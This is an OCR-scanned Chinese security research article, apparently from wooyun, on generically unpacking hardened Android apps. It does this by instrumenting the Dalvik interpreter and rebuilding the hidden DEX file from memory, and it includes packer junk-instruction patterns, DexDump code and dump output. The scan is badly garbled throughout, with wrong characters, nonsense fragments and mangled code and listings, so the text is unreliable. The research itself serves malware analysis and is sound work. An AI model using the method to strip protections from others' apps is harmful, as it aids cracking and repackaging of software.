服务 随 之 应 运 而 生 。 从 一 开始 只 有 甲 方 公司 提供 服务 到 现在 大 型 互联 网 公司 都 有 自己 的 加 国 
ae ， 同 时 与 金钱 相关 的 Android 应 用 程序 例如 银行 等 也 越 来 越 多 开始 使 用 加 固 保 护 自 

， 这 个 市 场 在 不 断 的 扩大 。 


个 典型 的 加 国保 护 服务 通常 能 够 提供 如 下 保护 : 防 递 向 ， 防 车 改 ， 反 调试 ， 反 窃取 等 功 
能 。 加 固 服 务 虽然 不 能 够 避免 和 防止 应 用 程序 自身 的 安全 问题 和 漏洞 ， 但 能 够 有 效 的 保护 程 
序 趴 实 逮 辑 ， 保 护 应 用 程序 完整 性 。 但 是 这 些 特点 同时 也 容易 被 恶意 程序 利用 ， 有 数据 表明 
随 着 加 固 保 护 的 流行 ， 加 壳 恶 意 程 序 的 比例 也 在 不 断 上 升 。 一 方面 恶意 程序 分 析 需 要 先 脱 
壳 ， 另 一 方面 正常 的 应 用 程序 如 果 补 经 易 脱党 后 分 析 ， 其 面临 的 风险 也 会 上 升 。 


0x01 研究 对 象 


通常 加 固 服务 提供 DEX 的 整体 加 固 方案 和 定制 化 的 加 固 。 定 制 化 的 加 固 通常 需要 与 开发 更 为 
紧密 的 结合 ， 可 能 涉及 更 深层 次 加 固 (如 native 代 码 加 固 等 ) ， 而 DEX 整 体 加 国 只 需要 用 户 提 
供 编译 好 的 Android 应 用 程序 APK 即 可 。 前 者 目前 缺乏 样本 并 需要 与 加 固 厂 商 深度 合作 ， 而 后 
者 被 大 多 数 加 固 服务 厂商 作为 最 基本 的 免费 服务 提供 ， 因 而 后 者 被 使 用 的 更 为 广泛 。 本 文 主 
要 研究 对 象 是 针对 后 者 的 Android 应 用 程序 可 执行 文件 DEX 的 保护 ， 即 DEX 文 件 加 密 ， 旨 在 研 
究 通 用 的 DEX 文 件 恢复 方法 。 而 定制 化 的 加 固 服 务 或 针对 native 代 码 的 混淆 保护 等 不 在 本 文 研 
完 范 围 内 。 


0x02 加 固 服务 特点 


我 们 通过 一 个 静态 逆向 加 固 方 法 的 例子 来 详细 描述 加 固 服务 通常 具有 的 特点 。 该 例子 是 几 个 
月 前 某 加 固 厂 商 使 用 的 方案 ， 由 于 加 固 服务 经 常 aera 因此 实现 细节 并 不 适 
用 于 现在 的 产品 ， 或 其 他 加 固 服务 ， 但 整体 的 加 固 思 想 和 方法 和 使 用 的 保护 手段 基本 上 大 同 
小 异 o 


通常 当 我 们 用 静态 工具 分 析 一 个 加 固 后 的 APP 时 ，AndroidManifest.xml 文 件 里 会 在 保留 原始 
的 所 有 信息 ， 包 括 定义 的 组 件 、 权 限 等 等 的 基础 上 ， 新 增 一 个 入 口 点 类 ， 通 常 是 application。 


而 DEX 的 代码 是 这 样 的 。 


Android 应 用 程序 通用 脱 这 方法 研究 


DEX 代 码 只 包含 很 少 的 类 和 代码 ， 其 主要 是 做 些 检测 工作 或 者 准备 工作 ， 然 后 通过 载 入 一 个 
native 库 去 动态 加 载 原始 的 DEX 文 件 。 由 于 使 用 了 动态 加 载 机 制 ， 因 此 加 固 过 的 DEX 文 件 中 不 
会 涉及 原始 DEX 的 丫 正 代码 (也 有 一 些 加固 并 没有 采取 完整 DEX 的 动态 加 载 ) © 


接着 使 用 IDA 去 逆向 入 口 点 加 载运 行 的 native 代 码 ， 通 常 so 库 也 是 被 混淆 加 过 的 。 手 段 包 括 破 
坏 ELF 头 部 信息 让 IDA 解 析 失 败 ， 如 下 图 : 





p File Edit Jump Search View Options Windows- Help 


ig e-9-: Qi dabat ru X| > matar 


ing file into the database. 


o The SHT entry size is invalid. Continue? 





Drag a file here to ¢ 


drops.wooyun.org 


o SHT table size or offset is invalid. Continue? 





e to disassemble 


drops.wooyun.org 
通过 readelf 可 以 明显 看 到 ELF 头 部 的 几 个 字段 是 有 问题 的 。 
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修复 之 后 ，IDA 可 以 正常 反 汇 编 so 文 件 了 。 接 着 我 们 从 入 口 点 开始 分 析 ， 会 发 现 F5 反 编译 成 C 
代码 会 有 问题 ， 多 个 函数 内 容 都 不 能 反 编 译 成 正常 的 C 代 码 。 直 接 看 汇编 代码 看 到 如 下 的 花 指 


a: 


STMFD SP!, {RØ} 
ADRL RO, sub 3484 
SUB RO, RO, #4 

BX RO ; loc 3480 


loc_3480: 
LDMFD 1, {RQ} 
STMFD I, {R3-R5,LR} 


STMFD 

ADRL RO, loc 3304 
SUB RO, RO, #4 

BX RO ; loc 3300 


loc_3300: 
LDMFD SP!, {RO} 


# 真 正 有 用 的 指令 
又 是 一 个 模式 
STMFD 





这 是 我 们 总 结 的 该 产品 的 花 指 令 模式 。 它 会 通过 压 栈 跳 转 出 栈 的 方式 让 反 编 译 的 函数 辨识 出 
现 问 题 ， 因 为 反 编 译 通常 会 认为 一 个 压 栈 操作 为 函数 调用 ， 而 其 实 他 通过 压 栈 ， 计 算 寄 存 器 
值 ， 跳 转 再 出 栈 让 反 编 译 失 效 后 并 平衡 栈 后 ， 再 执行 一 条 站 正 有 用 的 指令 。 因 此 上 述 例子 中 
RAR AEA TEA © 


通过 写 脚本 甚至 是 人 工 的 方式 可 以 把 丨 正 的 汇编 指令 提取 出 来 。 提 取 后 再 逆向 代码 ， 其 功能 
是 去 解密 JN|I_OnLoad 兄 数 。JNI_OnLoad 会 从 一 段 数据 中 再 解密 出 另 一 个 ELF 文 件 ， 而 此 时 
这 个 新 的 ELF 文 件 还 不 能 正确 反 汇 编 ， 后 面 的 代码 会 接着 对 该 ELF 进 行 数据 的 修正 。 先 解压 新 


Android & 





ELF X4  fdtext& > J.textim T 38 — key MF rotext » 3/5 7 ARR d — AGES 
DEX 的 党 程序 ， 形 如 : 
BSS SSS SS ESS SEs eA | uuu as 


向 Library function Data J Regular function I Unexplored [BÉ Instruction FExternal symbol 
Functions window Oo @ x | [5] zm View-A | seudocode-B E Pseudocode-A | | 





[8] Hex mm 日 [A] Structures | | 
























Eucfiótcnnms ^ "Ha . fastcall (int a1) 
Unwind GetLanguageSpecificData ` 
- - 3 4; -5@1 
_Unwind_GetDataRelBase n ide A ia 
-Unwind GetTextRelBase 5| int v3: // r4@2 
; 
JNI OnLoad 6| int vh; // r832 
[f| processDvmLoader( JNIEnv *) 7| int v5; /7 r282 
s r ; 
d runtime PE 8| DexUtil «v6; // STOOD G2 
f | findModuleAddr(char const*,bool (* 9| char *u7; // r8393 i 
f | DexUtil::dexFileSetupBasicPointers(u« 46| char U8: H rha3 
f| dex recover from mem 41| int v9: H r Bey 
3 
B o 12| int v18; // roe5 
Sum 13) int vii; // rsa9 
f | androidVersion( JNIEnv *) 44| int v12; // r8G9 
f| sub DBEO i s 
- 15 t v13; -0811 
于 | updateDexOrJar4X(DexOrJar4X *,Dexl 16 SU iid die rh@13 
updateDexOrJar2X(DexOrJar2X *,Dexl 437| ‘Goud xui5:/ Hf rois 
Ae ; 
ge) up dete^pplicabionCNIEnv char co 18| const char xsrc; // [sp*80h] [bp-36h]@3 
nativeSigCheck( JNIEnv *,char *,int) 19| int v18; // [sp*th] [bp-24h]@1 
ee 20| int v19; // [sp+16h] [bp-28h]81 
su i 
E 21| DexUtil 28; 14h bp-1Ch]@1 
f| getDexOrJarFor4x( JNIEnv *,bool,voir 22 EXUETL SS SESBY ] [bp ] 
Í| runDex2Oat(char *,char *,char *) e 23| vt = at: 
f | writeDex(char *,uchar const*,uint) e 24| v2 = 8: 
Z] processArtLoader( JNIEnv *) e 25| vig = 8: 
£] getArtLib(void) e 3i wig xg: 
f | getLock(void) e 27| u28 = 8; 
Z| getCurrent Thread{void) © 28) if ( tfindHoduleRddr( 
f | artRuntimeStart(void *) 29 “apk@classes .dex" 
5 pihop ect eee SAUCE punem 38 (bool ( cdecl *)(const unsigned _ int8 *, unsigned int, void x*))sub 56Ch, 
LZ] artDexFileOpenMemory(uchar const 21 &u18 m um S 
f| getRuntime(void) : 
32 k N 
Fal getClassLinker(void) 33| 《 pecksgeriuney-2 
u Se est acral sali AIDE e 34 v3 = v18; 
f| geUNIEnvFromThread(void *) e 35 v = operator new(24); 
artFindPrimitiveClass( JNIEnv *,char; e 36 u5 = *( DUORD x)(u3 132); 
GetSystemClassL oader(void) e 37 UO (DERUELL xjuh: 
Bet [bread omen EE al © 38|  DexUtil::DexUtil(on); 
ThreadGetCurrentMethod(void *,uin e 39 U28 = Us: 
getCurrentMethod(_JNIEnv *) e 50 i Util:: i 6 
artLookupClass( JNIEnv *,char const M 3 CEE Lea ng 
a E sre = (const char x)(x(( DWORD *)u28 + 2) + 8); 
decodelObiechivald jobject 9 43 v? = strchr(src, 58); 
artRegisterDexFile(void *,void const* e. Es v8. = uz: 
i = : A ; 
artRegisterOatFile(void const") t e 45 if ( v7 € src ) 
artFindOatFileFromOatLocation(voic 46 " 
oOaFicErtoid d Vets 
a atFileend(vol 
© 48 oto LRBEL 6; 
artSetCompileTimeClassPath(void *, 49 n 3 
artFindOatFileFromOatLocationLock e 58 v18 = atoi(u7 + 1); 
artRegisterOatFileLocked(void const e 51 resSum = v10: 
à Ua uc mk ; 
eaaa E c» v9 = nativeSigCheck(v1, packageName, v19); drops.wooyun.org 














artOnenNevFilefinid *Y 


以 上 步骤 其 实 是 一 个 ELF 文 件 的 党 。 oe &)ELF 3 £F T X SE DEX 50 59 AP R AB 
序 。 这 个 程序 并 没有 混淆 或 者 加 过， 通过 逆向 后 发 现 ， 他 会 取 原 始 DEX 后 的 一 段 padding 数 
据 ， 获 取 一 些 解 密 和 解压 需要 的 参数 ， w ue ' 就 能 得 到 丨 正 原始 的 
DEX 文 件 了 。 当 然 ELF 中 还 包括 一 些 反 调试 反 分 析 的 代码 ， ee 态 分 析 ， 不 需要 顾 

及 这 部 分 代码 ， 如 果 是 使 用 调试 器 去 附加 进程 使 用 dump 等 动态 分 析 时 就 需要 考虑 怎么 优雅 的 
bypass 这 些 反 调试 技巧 了 。 


en ep RUN 虽然 不 同 的 加 固 服务 在 很 多 技术 细节 包括 解密 算法 、 
花 指令 模式 、ELF 这 等 等 上 天 差 地 别 ， 但 基本 上 能 够 代表 绝 大 多 数 使 用 动态 加 载 DEX 方 式 的 加 
eens 运 和 静态 逆向 和 破解 它 的 思想 方法 。 我 们 也 是 以 这 个 例子 来 管 中 宽 
鹏 。 因 为 频繁 的 变换 解密 算法 和 加 固 方 式 也 是 加 国 服 务 的 第 一 大 特点 。 
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同时 事实 上 还 存在 一 些 加 固 并 没有 使 用 完整 DEX 文 件 的 动态 加 载 机 制 ， 而 是 使 用 运行 时 动态 
自修 改 ， 这 种 机 制 下 加 固 后 的 DEX 文 件 中 将 存在 原始 DEX 中 的 部 分 准确 信息 ， 但 受 保护 的 部 
分 代码 还 是 会 选择 其 他 方式 隐藏 。 另 外 还 有 两 者 相 结合 的 方式 。 后 面 的 案例 分 析 中 我 们 将 有 
所 涉及 。 


总 结 一 下 ， 一 个 加 固 过 的 Android 应 用 程序 实际 上 主要 是 隐藏 盖 正 的 DEX 文 件 ， 其 自身 也 会 加 
入 诸多 保护 措施 来 防止 被 轻易 逆向。 可 以 看 到 如 果 纯 静态 逆向 分 析 其 脱 壳 算法 会 非常 耗 时 耗 
力 ， 另 外 不 同 的 加 固 服 务 采取 不 一 样 的 算法 ， 而 每 个 本 身 又 会 频繁 变换 算法 和 加 固 技术 让 纯 
静态 的 逆向 脱 沉 方法 短 时 间 内 就 失效 。 同 时 加 固 服 务 还 会 采取 除 DEX 动 态 加 载 以 外 的 诸多 安 
车 应 用 程序 保护 措施 ， 我 们 这 里 稍 作 总 结 ， 并 不 展开 ， 因 为 这 部 分 内 容 甚至 可 以 单独 写 文章 


详细 说 。 


第 一 大 类 是 完整 性 检验 。 包 含 了 在 运行 时 对 自身 的 完整 性 校 验 ， 如 检查 内 存 中 DEX 文 件 的 检 
验 值 和 检查 应 用 程序 证 书 来 检测 是 否 被 重 打包 及 插入 代码 。 以 及 对 自身 环境 的 检测 ， 如 通过 
检查 特定 设备 文件 等 方式 检测 模拟 器 ， 通 过 ptrace 或 者 进程 状态 等 方式 检测 是 否 被 调试 ， 
hook 特 定 的 函数 防止 代码 内 存 被 读 取 或 dump 等 。 


第 二 大 类 是 代码 混淆 。 通 常 混 淆 需要 基于 源码 或 字 节 码 上 修改 ， 其 目的 是 为 了 让 分 析 者 更 难 
以 理解 程序 的 语义 。 最 常见 的 包括 修改 变量 名 ， 方 法 名 ， 类 名 等 ， 加 密 常 量 字 符 串 ， 使 用 
Java 反 射 机 制 调用 方法 ， 插 入 垃圾 指令 或 无 效 代码 打 乱 程序 控制 流 ， 使 用 更 为 复杂 的 操作 替 
换 原 始 的 基本 指令 ， 使 用 JNI 方 法 打 断 控制 流 等 。 


第 三 大 类 我 们 定义 为 防 分 析 或 代码 隐藏 技术 ， 其 目的 是 为 了 用 各 种 方法 防止 程序 代码 被 直接 
暴露 ， 轻 易 分 析 。 最 常见 的 就 是 上 述 的 DEX 整 体 加 密 保 护 ， 以 及 运行 时 动态 自修 改 。 运 行 时 
动态 自修 改 主 要 是 在 程序 运行 时 当 执行 到 特定 的 类 或 方法 时 才 将 代码 解密 并 执行 ， 同 时 还 可 
能 动态 之 后 才 修 正 或 修改 部 分 dalvik 数 据 结构 让 分 析 变 得 困难 。 另 外 一 些 防 分 析 技 术 需 要 利用 
一 些小 的 技巧 。 例 如 利用 静态 分 析 工具 的 pug， 或 解析 时 的 特性 来 做 对 抗 ， 包 括 曾经 出 现 的 

manifest cheating，APK 伪 加 密 ，dex 文 件 中 的 方法 隐藏 ， 插 入 非法 指令 或 不 存在 的 类 让 静态 
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0x03 脱 充 方法 思想 


面 对 加 固 程 序 ， 当 前 比较 流行 和 常用 的 脱党 方法 主要 是 两 种 方法 。 一 种 是 静态 的 逆向 分 析 ， 
其 缺点 也 很 明显 ， 难 度 大 而 且 无 法 对 抗 变换 算法 。 另 一 种 主要 是 基于 内 存 dump 技 术 的 脱 壳 。 
缺点 在 于 需要 考虑 先 bypass 各 种 反 调 试 的 方法 ， 同 时 还 需要 面 对 日 益 发 展 和 新 的 层出不穷 的 
反 内 存 dump 的 各 种 技巧 。 例 如 鞭 改 dex 文 件 头 防 穷 搜 ， 动态 鼻 改 dalvik 数 据 结 构 破 坏 内 存 中 的 
DEX 文 件 等 等 ， 这些 对 抗 技术 让 即使 dump 出 DEX 文 件 后 ， 还 需要 做 大 量 的 通过 观察 加 固 特性 
后 的 人 工 修 复工 作 。 


所 以 我 们 提出 一 种 通用 的 自动 化 脱 过 方法， 我 们 的 方法 基于 动态 分 析 ， 无 需 关 心 各 个 不 同 的 
加 国保 护 具体 实现 ， 也 可 以 统一 绕 过 各 种 反 调 试 的 手段 ， 同 时 也 不 需要 做 后 期 大 量 的 修复 工 
作 。 


首先 我 们 脱党 的 对 象 是 Android 应 用 程序 中 的 DEX 文 件 ， 因 此 我 们 选择 直接 修改 Android 系 统 
中 Dalvik 虚 拟 机 的 源 代码 进行 插 柱 。 因 为 DEX 文 件 中 的 代码 都 需要 在 Dalvik 虚 拟 机 上 解释 执 
行 ， 所 有 的 丨 实行 为 都 能 在 Dalvik 虚 拟 机 上 暴露 。Dalvik 有 多 个 解释 模式 ， 其 中 有 portable 模 
式 是 基于 C++ 实 现 的 ， 而 其 他 模式 由 于 优化 的 缘故 使 用 平台 相关 的 汇编 语言 开发 ， 为 了 方便 实 
现 我 们 的 播 桩 的 代码 ， 一 旦 发 现 开始 解释 执行 需要 被 脱 壳 的 APP 时 ， 我 们 先 (源码 目录 
dalvik/vm/interp/Interp.cpp) 将 解释 模式 改 为 portable。 这 么 做 的 一 个 好 处 在 于 直接 修改 执行 
环境 可 以 让 加 沉 程 序 更 加 难以 检测 脱党 行为 的 存在 ， 相 比 于 调试 器 附加 等 方法 ， 该 方法 更 为 
透明 。 在 解释 器 上 做 的 另 一 个 好 处 在 于 不 需要 去 关心 加 固 程 序 在 哪个 阶段 进行 类 的 加 载 和 初 
始 化 以 及 解密 代码 等 ， 直 接 在 运行 时 就 能 得 到 最 丨 实 的 数据 和 行为 。 播 桩 代码 实现 在 Dalvik 解 
释 执行 的 每 条 指令 切换 处 (dalvik/lvm/mterp/out/InterpC-portable.cpp) ， 这 样 可 以 在 执行 过 
> 处 进行 脱党 的 操作 ， 一 边 应 对 边 运 行 边 解密 的 加 国 程 序 。 最 后 基于 源码 的 修 

能 够 实施 丨 机 部 署 ，Android 原 生源 码 可 以 完美 支持 所 有 的 Nexus 系 列 手 机 ， 也 不 需要 去 应 
对 加 固 程 序 的 检测 模拟 器 手段 。 


脱 壳 的 本 质 是 去 获取 程序 站 实 的 行为 ， 因 此 插 桩 代码 其 实 就 是 去 得 到 内 存 中 的 Dalvik 数 据 结 

构 ， 来 反映 被 执行 的 丨 实 代码 。 在 指令 执行 时 可 以 直接 得 到 该 条 指令 属于 的 方法 ，Method 这 
个 结构 。 而 每 个 被 执行 的 方法 中 都 有 该 方法 属于 的 类 对 象 clazz， 而 clazz (源码 目录 
dalvik/vm/oo/Object.h) 中 又 有 pDvmDex (dalvik/vm/DvmDex.h) 对 象 ， 其 中 有 

pDexFile (dalvik/libdex/DexFile.h) 结构 体 代 表 了 DEX 文 件 ， 也 就 是 说 ， 执 行 过 程 中 获取 当前 
方法 后 ， 用 curMethod->clazz->pDvmDex->pDexFile 就 能 够 得 到 这 ne on 

构 。 该 结构 体 中 包含 了 所 有 DEX 文 件 在 解释 其 中 被 执行 时 的 内 存 信 息 ， 通 过 解析 这 个 DexFile 
结构 体 就 能 恢复 出 最 丨 实 的 DEX。 


0x04. 简单 脱党 实现 


至 此 ， 我 们 的 第 一 个 反应 是 有 没有 现成 的 程序 ， 可 以 去 翻译 Dalvik 字 节 码 的 ， 但 是 以 读 入 内 存 
中 的 DexFile 结 构 体 为 输入 ， 同 时 可 以 直接 基于 源码 实现 ， 也 就 是 用 C/C++ 实现 的 ， 而 不 是 像 
更 多 的 静态 逆向 工具 直接 以 读 入 一 个 静态 DEX 文 件 为 输入 。 找 了 下 发 现 Android 系 统 源码 里 本 
身 就 提供 了 DexDump (dalvik/dexdump/DexDump.cpp) 这 个 工具 ， 直 接 能 满足 这 个 要 求 。 
我 们 对 DexDump 代 码 稍 作 修改 ， 插 入 到 解释 器 中 ， 如 下 图 : 


void processDexFile( char* fileName, DexFile* pDexFile: 
char* package = 


tht); 


(gOptions.verbose) { 
printf("Opened '$s', DEX version 
pDexFile->pHeader->magic +4); 


, fileName, 


(gOptions.dumpRegisterMaps) { 
dumpRegisterMaps(pDexFile); 


3 


(gOptions.showFileHeaders) { 


dumpFileHeader(pDexFile); 
dumpOptDirectory(pDexFile); 


(gOptions.outputFormat -- OUTPUT XML) 

printf("<api>\n"); 

(i = 8; i < (int) pDexFile->pHeader->classDefsSize; i++) { 
(gOptions.showSectionHeaders) 


dumpClassDef(pDexFile, i); 


dumpClass(pDexFile, i, &package); 





让 他 去 读 取 DexFile， 默 认 就 直接 在 一 个 APP 的 主 Activity 处 执行 这 个 代码 ， 主 Activity 可 以 通过 
AndroidManifest.xml| 文 件 获取 ， 因 为 该 文件 中 的 入 口 点 类 都 不 会 被 隐藏 。 我 们 发 现 这 样 几 乎 
就 能 够 应 对 大 多 数 加 固 程序 了 ， 能 够 得 到 加 固 程 序 被 隐藏 的 DEX 文 件 中 的 申 实 代码 ， 输 出 如 
TH: 


Virtual methods - 
#0 : (in Lcom/example/simple/MyActivity;) 
name : “onCreate 
type : '(Landroid/os/Bundle;)V' 
access : @x@@@4 (PROTECTED) 
code 
codeOff 


8 16-bit code units 


| [@53cc8] com.example.simple.MyActivity.onCreate: (Landroid/os/Bundle;)V 


: 1202 
: ef20 J 1 uper {v1@, v11}, Land app/Activity;.onCreate:(Landroid/os/Bundle;)V // method(jee21 
: 2 ghié v3, sint 

6: invoke-virtual (v o! e/si e/MyActivity;.setContentView:(I)V // method@17cf 


ang/String;ljava/lang/String;)I // method@1544 


/content/Context;Ljava/lang/Class; ) 
: invoke-virtual (v10, v6}, Lcom/example/simple/MyActivity; .sendBroadcast:(Landroid/content/Intent;)V // 


: new-instance v7, Landroid/conte e ype@ee2c 
: const-class v3, Lcom/exampl J / type@e36s 
: invoke-direct (v7, v10, v3}, Landroid/conte Intent; .«init»:(Landroid/content/Context;Ljava/lang/Class;) 


: invoke-virtual {v1@, v7 om/example/simple/MyActivity;.startService:(Landroid/content/Intent;) 
// method@17de 
|0024: invoke-virtual {v10}, Lco /s ictivity;.getContentResolver:() 
/ method17c9 

|0027: mov ult-object ve 

1a@3 900d |@@28: ring v3, "content: //com.example.simple.MyContentProvider/" // string@ed 

7110 8f@1 6300 |@@2a: invo {v3}, Landroid/net/Uri; .parse:(Ljava/lang/String; )Landroid/net/Uri; // method@e18f 
|ee2d: mov 





但 这 个 方法 的 缺点 也 很 明显 ， 就 是 输出 是 dalvik 字 节 码 的 文本 形式 ， 一 方面 无 法 反 汇 编 成 
Java， 另 一 方面 文本 形式 非常 不 适合 后 续 的 复杂 程序 的 分 析 ， 我 们 的 最 佳 目的 是 得 到 一 个 完 
整 的 DEX 文 件 。 


0x05 完善 脱 壳 实现 


通常 到 上 一 步 ， 许 多 其 他 的 脱 沉 工具 为 了 恢复 出 完整 的 DEX 文 件 ， 会 选择 直接 读 取 pDexFile- 
II 起 始 地 址 ， ARR LIA 内 存 dump 出 来 。 然 
和 这 样 dump 出 来 的 代码 里 依然 不 包含 监 实 的 代码 ， 这 是 由 于 DEX 
文件 中 部 分 丨 实 信 息 在 运行 时 被 修改 和 映射 到 了 文件 连续 MIA 如 下 图 ， 一 个 
DEX 文 件 被 载 入 内 存 后 ， 理 应 是 在 一 个 连续 的 内 存 空间 中 ， 然 后 被 解析 赋值 为 各 个 动态 执行 
时 Dalvik 所 需 的 结构 体 ， 而 部 分 索性 性 质 的 结构 体 应 该 指向 连续 的 data 数 据 块 。 但 加 固 程 序 可 
能 会 做 些 修 改 ， 例 如 将 header 的 部 分 数据 自 改 ， 以 及 重新 分 配 不 连续 的 内 存 来 存放 data 数 
据 ， 并 让 那些 索引 数据 块 指 向 的 新 分 配 的 data 块 。 这 样 如 果 直 接 用 dump 的 方法 ， 则 无 法 得 到 
完整 的 DEX 文 件 。 
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我 们 旨 在 以 统一 的 方法 恢复 出 原始 的 DEX 文 件 ， 不 希望 还 需要 针对 的 不 同 的 壳 来 做 后 续 的 修 
复 ， 因 为 这 样 又 将 进入 到 和 静态 逆向 加 固 算法 一 样 的 困境 。 因 此 我 们 基于 上 述 简单 实现 ， 有 
了 个 更 加 完善 的 实现 方案 ， 称 之 为 DEX 文 件 重 组 。 过 程 非常 简单 ， 就 是 在 程序 执行 过 程 中 先 
获取 所 有 解释 器 所 需 的 Dalvik 数 据 结 构 ， 这 里 都 是 内 存 中 申 实 的 被 解释 执行 的 数据 结构 ， 然 后 
再 将 这 些 数据 结构 组 合 重新 写 回 成 一 个 新 的 DEX 文 件 。 如 上 图 所 示 ， 即 使 内 存 不 连续 ， 我 们 
也 无 需 关 心 他 对 原始 映射 内 存 的 操作 ， 可 以 直接 获取 每 块 不 连续 的 数据 ， 按 照 一 定 的 规范 去 
把 这 些 数据 重组 成 一 个 新 的 DEX 文 件 。 第 一 步 是 去 准确 获取 每 个 Dalvik 数 据 机 构 ， 为 了 保证 
获取 的 准确 性 ， 我 们 采取 的 方式 是 和 运行 中 解释 器 中 去 执行 程序 时 的 获取 方式 一 致 (参考 
tenes ， 因 为 一 个 DEX 文 件 ， 同 一 块 数据 可 能 有 很 多 种 方式 
去 获取 的 ， 打 个 比方 ， 常 量 字 符 串 可 以 去 读 文 件 头 里 的 偏 移 去 获取 ， 也 可 以 通过 stringld 列 表 
去 获取 ， 等 等 。 正 常 oe to 但 是 加 固 程 序 会 去 做 一 些 破坏 。 但 它 

不 能 去 破坏 运行 时 这 些 数据 被 获取 时 用 的 数据 ， 因 为 这 个 一 旦 破坏 ， 程 序 就 无 法 正常 运行 
了 。 具 体 的 获取 方式 如 下 图 所 示 : 
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我 们 需要 遍历 每 个 数组 (如 pStringlds > pProtolds > ... > pClassDefs) 里 的 某 些 指针 和 偏 移 ， 
每 项 中 都 逐一 获取 ， 将 其 内 容 再 合并 成 一 个 大 类 (如 stringData > typelist > ... > ClassData > 
Code) 。 接 着 获取 完 重 写 的 时 候 ， 需 要 注意 几 个 问题 。 首 先是 对 获取 这 些 数 据 块 的 排列 问 
题 ， 我 们 参考 了 dalvik/libdex/DexFile.h 里 的 map item type codes 枚 举 的 顺序 进行 排列 。 排 列 
好 需要 调整 每 个 数据 项 里 的 偏 移 值 为 新 的 偏 移 ， 如 stringDataOff, parametersOff, 
interfacesOff, classDataOff, codeOff 等 ， 接 着 对 于 DexHeader, MapList 这 两 个 结构 体 中 的 
值 ， 我 们 需要 重新 计算 后 填写 ， 而 不 是 直接 取 原 来 的 值 ， 对 于 一 些 固定 的 值 例 如 Header 里 面 
的 文件 头等 ， 我 们 根据 已 有 知识 直接 填写 。 最 后 需要 考虑 到 内 存 中 的 数据 表达 和 DEX 文 件 中 
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的 某 些 数据 格式 的 差异 ， 例 如 有 些 数据 项 在 文件 中 是 ULEB128 编 码 的 ， 而 在 内 存 中 就 直接 是 
int 类 型 ， 另 外 还 需要 注意 4 字 节 的 对 齐 ， 以 及 encoded method format 里 是 field idx diff: 
method idx_diff 而 不 是 简单 的 index 等 。 具 体 细 节 可 参考 官方 的 DEX 文 件 格式 文档 


https://source.android.com/devices/tech/dalvik/dex-format.html 


RANE E 2n 8 1K ABT — 35 3E > d] 40 PL feannotationd8 X 69 Ade 2549 > AA 3x SBA iR 
实 程序 使 用 不 多 ， 而 结构 又 特别 复杂 ， 忽 略 以 后 对 分 析 程 序 真 实行 为 影响 不 大 。 


0x06 实验 与 发 现 


改 完 代码 后 ， 我 们 重新 编译 了 libdvm 模 块 并 将 新 生成 lilbdvm.so 写 入 系统 目录 /system/lib/ 下 规 
盖 掉 原始 的 库 文件 ， 我 们 实验 的 对 象 是 Galaxy Nexus 手 机 对 应 Android 4.3 版 本 和 Nexus 4 手 
机 对 应 的 Android 4.4.2 版 本 。 然 后 我 们 提交 了 一 个 简单 的 应 用 程序 ， 送 到 各 个 在 线 加 固 服务 
上 获取 加 固 后 的 应 用 程序 版 本 再 实施 脱 完 。 实 验 发 现 几 乎 能 够 针对 所 有 的 加 固 程 序 恢复 出 原 
始 的 DEX 文 件 。 以 下 是 一 些 针对 加 固 程 序 的 发 现 。 主 要 集中 在 不 同 的 加 固 所 使 用 的 自我 保护 
的 手段 ， 这 里 有 些 结果 是 DexDump 的 文本 ， 因 为 有 些 保 护 措 施用 这 个 方式 更 好 的 展示 出 细 
节 ， 当 然 全 部 都 能 直接 恢复 成 DEX 文 件 。 


DEX file header: 


magic 

checksum 
signature 

file size 
header_size 
link_size 
link_off 
string ids size 
string ids off 
type_ids size 
type_ids off 
field ids size 
field ids off 
method ids size 
method ids off 
class defs size 
class defs off 
data_size 
data_off 





FRACHWACL 


: 000518b2 

: 7d16...0500 

: 333798 

: 334841 

x 

: 8 (0x000000) 

: 6991 

: 112 (0x000070) 

: 1020 

: 28076 (0x006dac) 
: 1662 

: 47648 (9x86ba26) 
: 6368 

: 60944 (0x00ee10) 
: 643 

: 111888 (@x@1b510) 
: 686112 

: 133296 (0x0208b0)} 


DEX file header: 

magic : *\@\O\E\E\E\0\e\0° 
checksum : 00000000 
signature : 0000...0000 

file size : 667868 

header size = 142 

link size : B 

link_off : 0 (0x000000) 
string ids size : 7000 


S s off : 0 (0x00000 


: 1020 


field ids off : 0 (0x000000) 


class defs off : 0 (0x000000) 


data_size : 533396 
data_off : 132672 (@x@20640) 





以 上 两 个 例子 表明 ， 有 些 加 固 程序 会 将 magic number 抹 去 ， 来 隐藏 内 存 中 的 DEX 文 件 ， 让 穷 
搜 DEX 文 件 的 方式 失效 ， 另 外 还 会 自 改 header 的 大 小 ， 以 及 将 header 中 的 各 种 字段 偏 移 值 抹 
去 ， 由 于 我 们 用 的 方法 是 对 header 重 新 计算 ， 因 此 重组 后 的 DEX 不 受 其 影响 。 


: (in Lcom/example/simple/MyActivity;) 
name : 'onCreateOptionsMenu' 
type : '(Landroid/view/Menu;)Z' 
access : 0x0001 (PUBLIC) 
code - 
codeOff : Oxffdef5d4 
registers 3 
ins 22) 
outs s3 
insns size : 18 16-bit code units 

ffdef5d4: 


ffdef5e4: 7100 1319 0000 


ffdef5ea: @a02 move-result v2 

ffdef5ec: 7110 1419 0200 0 : invoke-static (v2), Lpnf/this/object/does/not/Exist;.b:(I)V // method@1914 

ffdef5f2: 6e10 0018 0300 : invoke-virtual {v3}, Lcom/example/simple/MyActivity; .getMenuInflater 
Landroid/view/MenuInflater; // method@1800 

ffdef5f8: 0c00 : move-result-object v@ 

ffdef5fa: 1501 077f : const/high16 v1, #int 2131165184 // #707 

ffdef5fe: 6e39 ae15 1004 : invoke-virtual (v0, v1, v4}, Landroid/view/MenuInflater; .inflate: (ILandroid/view/Menu; 
)V // method@15ae 

ffdef604: 1210 : const/4 v0, #int 1 // #1 

ffdef606: 0f00 : return v@ 





Virtual methods 


type : *(Ljava/lang/String;Ljava/lang/String;)V‘ 
access : 6@x6661 (PUBLIC)| 

code 

codeOff : Oxffdef92c 

registers = 

ins 3E 


outs : 0 
insns size : 1 16-bit code units 


ffdef92c: | [ffdef92c] pnf.this.object.does.not.Exist.testdex2jarcrash: ( 
Ljava/lang/String;Ljava/lang/String;)V 
ffdef93c: 0e00 [0000: return-void 
catches : (none) 
positions 
locals E 
0x0000 - 0x0001 reg-0 this Lpnf/this/object/does/not/Exist; 
0x0000 - 0x0001 reg-1 test1 Ljava/lang/String; 
0x0000 - 0x0001 reg-2 test2 Ljava/lang/String; 


Source file idx : -1 (unknown) 





